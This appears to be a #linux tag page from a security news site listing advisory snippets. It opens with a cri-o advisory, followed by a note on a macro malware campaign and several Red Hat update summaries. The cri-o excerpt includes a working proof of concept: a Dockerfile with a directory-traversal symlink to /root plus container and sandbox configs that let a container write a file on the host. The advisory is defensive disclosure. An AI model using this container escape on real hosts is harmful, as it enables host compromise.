Tag
#linux
### Impact A malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host. A workload built from this Dockerfile: ``` FROM docker.io/library/busybox as source RUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc FROM scratch COPY --from=source /bin /bin COPY --from=source /lib /lib COPY --from=source /extra . ``` and this container config: ``` { "metadata": { "name": "busybox" }, "image":{ "image": "localhost/test" }, "command": [ "/bin/true" ], "linux": { } } ``` and this sandbox config ``` { "metadata": { "name": "test-sandbox", "namespace": "default", "attempt": 1, "uid": "edishd83djaideaduwk28bcsb" }, "linux": { "security_context": { "namespace_options": { "network": 2 } } } } ``` will create a file on host `/host/mtab` ### Patches 1.30.1, 1.29.5, 1.28.7 ### Workarounds Unfortunately not ### References _A...
Beware Macro! Ukrainian users and cyberinfrastructure are being hit by a new malware campaign in which hackers are…
Red Hat Security Advisory 2024-3568-03 - New Red Hat Single Sign-On 7.6.9 package are now available for Red Hat Enterprise Linux 9.
Red Hat Security Advisory 2024-3567-03 - New Red Hat Single Sign-On 7.6.9 package are now available for Red Hat Enterprise Linux 8.
Red Hat Security Advisory 2024-3566-03 - New Red Hat Single Sign-On 7.6.9 package are now available for Red Hat Enterprise Linux 7.
Red Hat Security Advisory 2024-3561-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a server-side request forgery vulnerability.
Red Hat Security Advisory 2024-3560-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a server-side request forgery vulnerability.
Red Hat Security Advisory 2024-3559-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a server-side request forgery vulnerability.
Red Hat Security Advisory 2024-3553-03 - An update for the nodejs:16 package is now available for Red Hat Enterprise Linux 8.6.0 Advanced Update Support. Issues addressed include a denial of service vulnerability.
Red Hat Security Advisory 2024-3552-03 - An update for python-idna is now available for Red Hat Enterprise Linux 8.6. Issues addressed include a denial of service vulnerability.